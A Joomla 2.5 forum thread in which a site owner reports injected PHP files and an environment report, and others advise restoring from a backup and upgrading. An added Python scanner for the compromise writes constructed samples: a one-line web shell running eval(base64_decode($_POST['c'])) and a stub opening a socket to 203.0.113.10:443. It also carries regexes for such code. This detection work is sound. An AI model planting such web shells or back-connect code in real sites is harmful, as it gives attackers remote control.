Site Hacked - Help with FPA

Discussion regarding Joomla! 2.5 security issues.



Site Hacked - Help with FPA

Postby purplenova » Tue Mar 07, 2017 7:42 pm

I believe my site was hacked. Some folks were getting a 404 error when visiting the site, but when I tried initially everything looked OK. After more hunting, I found several PHP pages that had the line "$remote = <random IP address>" using port 443. Found this line in 2 separate files.

After a Google search or two, I found a research paper where someone spent two years tracking something called the Asprox botnet, and the paper also referenced the exact same "$remote =" IP address that I found.

Hopefully this is an easy fix.


Problem Description :: found strange php pages in root with remote ip address
Forum Post Assistant (v1.2.8) : 7th March 2017
Basic Environment :: Joomla! Instance :: Joomla! 2.5.19-Stable (Ember) 6-March-2014
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: 9004202 (uid: /gid: ) | Group: 100450 (gid: ) | Valid For: 2.5
Configuration Options :: Offline: 1 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 1 | Cache: 2 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-604.30.3.lve1.3.63.el6.nfsfixes.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /var/chroot/home/content/02/9004202/html | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.24 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: 0 | Magic Quotes: 1 | Safe Mode: 0 | Open Base: | Uploads: 1 | Max. Upload Size: 32M | Max. POST Size: 33M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.96-log (Client:5.5.19) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 1.91 MiB | #of Tables:  83
Detailed Environment :: PHP Extensions :: Core (5.3.24) | date (5.3.24) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | apc (3.1.13) | bcmath () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | imagick (3.1.0RC2) | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | session () | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | standard (5.3.24) | pspell () | Reflection ($Id: 4af6c4c676864b1c0bfa693845af0688645c37cf $) | Phar (2.0.1) | SimpleXML (0.1) | soap () | SQLite (2.0-dev) | exif (1.4 $Id$) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: Core Folders :: images/ (705) | components/ (705) | modules/ (705) | plugins/ (705) | language/ (705) | templates/ (705) | cache/ (705) | logs/ (705) | tmp/ (705) | administrator/components/ (705) | administrator/modules/ (705) | administrator/language/ (705) | administrator/templates/ (705) |

Elevated Permissions (First 10) ::
Extensions Discovered :: Components :: SITE :: com_mailto (2.5.0) 1 | com_wrapper (2.5.0) 1 |
Components :: ADMIN :: com_admin (2.5.0) 1 | Akeeba (4.7.4) 1 | com_banners (2.5.0) 1 | com_cache (2.5.0) 1 | com_categories (2.5.0) 1 | com_checkin (2.5.0) 1 | com_config (2.5.0) 1 | com_content (2.5.0) 1 | com_cpanel (2.5.0) 1 | com_finder (2.5.0) 1 | com_installer (2.5.0) 1 | com_joomlaupdate (2.5.0) 1 | com_languages (2.5.0) 1 | com_login (2.5.0) 1 | com_media (2.5.0) 1 | com_menus (2.5.0) 1 | com_messages (2.5.0) 1 | com_modules (2.5.0) 1 | com_newsfeeds (2.5.0) 1 | com_plugins (2.5.0) 1 | com_redirect (2.5.0) 1 | com_search (2.5.0) 1 | com_templates (2.5.0) 1 | com_users (2.5.0) 1 | com_weblinks (2.5.0) 1 | Admintools (3.4.4) 1 |

Modules :: SITE :: mod_articles_archive (2.5.0) 1 | mod_articles_categories (2.5.0) 1 | mod_articles_category (2.5.0) 1 | mod_articles_latest (2.5.0) 1 | mod_articles_news (2.5.0) 1 | mod_articles_popular (2.5.0) 1 | mod_banners (2.5.0) 1 | mod_breadcrumbs (2.5.0) 1 | mod_custom (2.5.0) 1 | mod_feed (2.5.0) 1 | mod_finder (2.5.0) 1 | mod_footer (2.5.0) 1 | mod_languages (2.5.0) 1 | mod_login (2.5.0) 1 | mod_menu (2.5.0) 1 | mod_random_image (2.5.0) 1 | mod_related_items (2.5.0) 1 | mod_search (2.5.0) 1 | mod_stats (2.5.0) 1 | mod_syndicate (2.5.0) 1 | mod_users_latest (2.5.0) 1 | mod_weblinks (2.5.0) 1 | mod_whosonline (2.5.0) 1 | mod_wrapper (2.5.0) 1 |
Modules :: ADMIN :: mod_custom (2.5.0) 1 | mod_feed (2.5.0) 1 | mod_latest (2.5.0) 1 | mod_logged (2.5.0) 1 | mod_login (2.5.0) 1 | mod_menu (2.5.0) 1 | mod_multilangstatus (2.5.0) 1 | mod_popular (2.5.0) 1 | mod_quickicon (2.5.0) 1 | mod_status (2.5.0) 1 | mod_submenu (2.5.0) 1 | mod_title (2.5.0) 1 | mod_toolbar (2.5.0) 1 | mod_version (2.5.0) 1 |

Plugins :: SITE :: plg_authentication_gmail (2.5.0) 0 | plg_authentication_joomla (2.5.0) 1 | plg_authentication_ldap (2.5.0) 0 | plg_captcha_recaptcha (2.5.0) 1 | plg_content_emailcloak (2.5.0) 1 | plg_content_finder (2.5.0) 0 | plg_content_geshi (2.5.0) 0 | plg_content_joomla (2.5.0) 1 | plg_content_loadmodule (2.5.0) 1 | plg_content_pagebreak (2.5.0) 1 | plg_content_pagenavigation (2.5.0) 1 | plg_content_vote (2.5.0) 1 | plg_editors-xtd_article (2.5.0) 1 | plg_editors-xtd_image (2.5.0) 1 | plg_editors-xtd_pagebreak (2.5.0) 1 | plg_editors-xtd_readmore (2.5.0) 1 | plg_editors_codemirror (1.0) 1 | plg_editors_tinymce (3.5.4.1) 1 | plg_extension_joomla (2.5.0) 1 | plg_finder_categories (2.5.0) 1 | plg_finder_contacts (2.5.0) 1 | plg_finder_content (2.5.0) 1 | plg_finder_newsfeeds (2.5.0) 1 | plg_finder_weblinks (2.5.0) 1 | PLG_JMONITORING_AKEEBABACKUP_T (1.0) 1 | plg_quickicon_extensionupdate (2.5.0) 1 | plg_quickicon_joomlaupdate (2.5.0) 1 | plg_quickicon_akeebabackup (1.0) 1 | plg_search_categories (2.5.0) 1 | plg_search_contacts (2.5.0) 1 | plg_search_content (2.5.0) 1 | plg_search_newsfeeds (2.5.0) 1 | plg_search_weblinks (2.5.0) 1 | plg_system_cache (2.5.0) 0 | plg_system_debug (2.5.0) 1 | plg_system_highlight (2.5.0) 1 | plg_system_languagecode (2.5.0) 0 | plg_system_languagefilter (2.5.0) 0 | plg_system_log (2.5.0) 1 | plg_system_logout (2.5.0) 1 | plg_system_p3p (2.5.0) 1 | plg_system_redirect (2.5.0) 1 | plg_system_remember (2.5.0) 1 | plg_system_sef (2.5.0) 1 | Security - jHackGuard (1.4.2) 1 | System - Admin Tools (3.4.4) 1 | PLG_SYSTEM_BACKUPONUPDATE_TITL (3.7) 1 | plg_user_contactcreator (2.5.0) 0 | plg_user_joomla (2.5.0) 1 | plg_user_profile (2.5.0) 0 |
Templates Discovered :: Templates :: SITE :: atomic (2.5.0) 1 | beez5 (2.5.0) 1 | beez_20 (2.5.0) 1 | TR_Neutrino (v1.1) 1 |
Templates :: ADMIN :: bluestork (2.5.0)
Last edited by purplenova on Tue Mar 07, 2017 7:47 pm, edited 1 time in total.
Thanks,
Tom
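A quick way to triage a Joomla 2.5 document root for the kind of injected file described in the post above, as an added example that is not part of this thread and not Joomla project code: a scanner that flags PHP files assigning an IPv4 literal to $remote, opening a socket or fetch to an IPv4 literal, or running eval() on decoded input, plus any PHP file sitting under the writable folders the FPA report lists (images/, cache/, tmp/, logs/). The sample tree, its file names and the 203.0.113.10 address are constructed for the demo (203.0.113.0/24 is a documentation range), not taken from the poster's site or from any published Asprox analysis.

```python
"""Triage a Joomla document root for injected PHP of the kind described in the
post: files assigning an IPv4 literal to $remote, opening a socket to an IPv4
literal, running eval() on decoded input, or simply being PHP inside the
writable folders the FPA lists (images/, cache/, tmp/, logs/).

Added example; not the poster's files and not Joomla project code. The
sample tree, file names and the 203.0.113.10 address are constructed
(203.0.113.0/24 is a documentation range).
"""
import os
import re
import tempfile

PHP_EXT = (".php", ".phtml", ".php5", ".phar")
WRITABLE_DIRS = {"images", "cache", "tmp", "logs"}   # all 705 in the FPA report
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"

# Name -> regex. Core Joomla 2.5 never hard-codes a peer address like this.
SUSPICIOUS = [
    ("remote-ip-literal",
     re.compile(r"\$remote\s*=\s*['\"]\s*" + IPV4 + r"(?::\d+)?\s*['\"]")),
    ("socket-to-ip",
     re.compile(r"\b(?:fsockopen|curl_init|file_get_contents)\s*\(\s*['\"](?:https?://)?" + IPV4)),
    ("eval-decode",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")),
]

def scan_file(path):
    """Names of the SUSPICIOUS patterns that match the file's contents."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    except OSError:
        return []
    return [name for name, rx in SUSPICIOUS if rx.search(data)]

def scan_tree(root):
    """Walk root; return {relative path: [reasons]} for every PHP file worth a look."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(PHP_EXT):
                continue
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = scan_file(full)
            if rel.split("/")[0] in WRITABLE_DIRS:
                reasons.append("php-in-writable-dir")
            if reasons:
                hits[rel] = reasons
    return hits

def _write(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)

def demo():
    """Build a constructed mini-site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php",
               "<?php\ndefined('_JEXEC') or die;\n// constructed stand-in for the front controller\n")
        _write(root, "components/com_content/controller.php",
               "<?php\ndefined('_JEXEC') or die;\nclass ContentController {}\n")
        _write(root, "remote_stub.php",                       # constructed back-connect stub
               "<?php\n$remote = \"203.0.113.10:443\";\n"
               "$fp = fsockopen(\"203.0.113.10\", 443, $errno, $errstr, 30);\n")
        _write(root, "images/banner.php",                     # constructed dropper in an upload dir
               "<?php eval(base64_decode($_POST['c']));\n")
        return scan_tree(root)

if __name__ == "__main__":
    for path, reasons in sorted(demo().items()):
        print(f"{path}: {', '.join(reasons)}")
```

Point scan_tree() at the real document root (here /var/chroot/home/content/02/9004202/html) and treat the output as a list to inspect, not as proof: a third-party extension can legitimately call curl_init or fsockopen, but a hard-coded IPv4 peer in a file you did not put there, or any PHP under images/ or tmp/, is a strong signal. Finding the files does not tell you how they got there, so the scan complements rather than replaces the restore-and-upgrade advice given later in the thread.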


Re: Site Hacked - Help with FPA

Postby sozzled » Tue Mar 07, 2017 7:44 pm

Please edit your last post, remove the "[ code ]" tag at the beginning and the "[ /code ]" tag at the end so that we can read your FPA report, thank you.

The most likely cause of the way your site was hacked is because you're using J! 2.5.19 which is, as you should know, outdated (over three years old), unsupported and known to be vulnerable to attack. Unfortunately for you, you've paid the price of risking your website to attack by using obsolete and vulnerable software. I feel sorry for you.
https://www.kuneze.com/blog
Former member of Kunena project team
If you think I’m wrong then say “I think you're wrong.” If you say “You’re wrong!”, how do you know?


Re: Site Hacked - Help with FPA

Postby purplenova » Tue Mar 07, 2017 7:54 pm

I knew it was outdated, and my host would normally notify me of updates ready for install, so I kinda ignored the situation until I started getting phone calls. A bit late, I know.

Other than your obvious observation, is there a remedy for my issue other than updating to the latest release, or will that even correct it?


Re: Site Hacked - Help with FPA

Postby sozzled » Tue Mar 07, 2017 8:05 pm

There are two ways to remediate the situation; remediate is a great word: it means try to patch things up so that they hang together long enough until you can address the root cause of the problem and fix it properly.

You can restore your website from a backup that you made before the phone calls started happening. This may mean going back to the way your site was operating a few months ago but, at least, it's a start and it'll get you working again (hopefully) for long enough for you to start doing the required work to bring your antiquated J! 2.5.19 website up to "speed" with J! 2.5.28. However, even with J! 2.5.28 you're not free from problems. J! 2.5.28 is also outdated, unsupported and vulnerable to attack.

So there's the band-aid approach.

The way to fix the problem properly is to attempt to salvage as much material that you can and utilise this by creating a website built with the current supported (and less-likely-to-be-attacked) version of Joomla, namely J! 3.6.5. This, of course, means some work but, then again, if something is worthwhile doing then that "something" requires the investment of time, labour (and, perhaps, money).

It all depends, really, on how valuable your website (that's now ruined) was to you and/or your business. I don't know the answer to that; that's something only you can decide.

As a start, you might like to read viewtopic.php?f=714&t=757645


Re: Site Hacked - Help with FPA

Postby purplenova » Tue Mar 07, 2017 8:10 pm

sozzled wrote:
As a start, you might like to read viewtopic.php?f=714&t=757645

Thank you!

